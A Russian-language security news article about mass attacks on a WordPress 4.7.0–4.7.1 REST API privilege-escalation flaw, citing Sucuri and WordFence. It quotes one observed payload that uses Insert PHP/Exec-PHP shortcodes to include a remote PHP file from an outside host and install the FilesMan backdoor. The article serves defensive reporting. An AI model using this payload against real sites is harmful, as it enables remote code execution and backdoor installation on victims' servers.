Массовые атаки на свежую уязвимость в WordPress REST API, исправленную в конце января 2017 года, продолжаются. На прошлой неделе мы рассказывали, что по данным компании WordFence, уязвимость привлекла внимание как минимум 20 хакерских групп, которым удалось скомпрометировать более 1,5 млн страниц. В настоящий момент количество пострадавших страниц перевалило за два миллиона, а атаки постепенно становятся серьезнее, как и прогнозировали специалисты.

Напомню, что свежая уязвимость была устранена с выходом WordPress 4.7.2, еще 26 января 2017 года. Баг обнаружили специалисты компании Sucuri, и они описывают его как неавторизованную эскалацию привилегий через REST API. Уязвимости подвержены версии 4.7.0 и 4.7.1. Однако публичное раскрытие информации о проблеме состоялось только неделю спустя, так как разработчики хотели, чтобы как можно больше сайтов спокойно установили обновления.

Уязвимость позволяет неавторизованному атакующему сформировать специальный запрос, при помощи которого можно будет изменять и удалять содержимое любого поста на целевом сайте. Кроме того, используя шорткоды плагинов, злоумышленник может эксплуатировать и другие уязвимости CMS, которые обычно недоступны даже пользователям с высокими привилегиями. В итоге атакующий может внедрить на страницы сайта SEO-спам, рекламу, и даже исполняемый PHP-код, все зависит от доступных плагинов.

Эксперты компании Sucuri заметили, что от простых дефейсов злоумышленники перешли к попыткам удаленного выполнения произвольного кода. Для этих целей хакеры используют плагины Insert PHP (100 000+ установок), Exec-PHP (100 000+ установок) и им подобные. Такие плагины позволяют внедрять PHP-код в посты, чтобы сделать кастомизацию проще.

Исследователи пишут, что теперь дефейс-сообщения хакеров содержат шорткоды для вышеупомянутых плагинов. То есть добавив к своим дефейсам PHP-код, злоумышленники могут добиться его выполнения. В блоге компании эксперты приводят следующий пример, замеченный ими в ходе изучения атак:

content:»[insert_php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/insert_php]
[php] include(‘http[:]//acommeamour.fr/tmp/xx.php’); [/php]»,
«id»:»61a»}

Данный пример приводит к скачиванию бэкдора FilesMan и его установке в директорию /wp-content/uploads/.

Теперь специалисты Sucuri рекомендуют администраторам отключить все потенциально опасные плагины и обновиться до WordPress 4.7.2, если они по какой-то причине еще этого не сделали. Исследователи поясняют, что такие атаки – это способ монетизации уязвимости. Тогда как обычными дефейсами много не заработаешь, размещение бекдора на сервере жертвы позволяет злоумышленникам вернуться позже, даже после устранения оригинальной уязвимости, и разместить на скомпрометированном ресурсе SEO-спам, рекламу или малварь.



Оставить мнение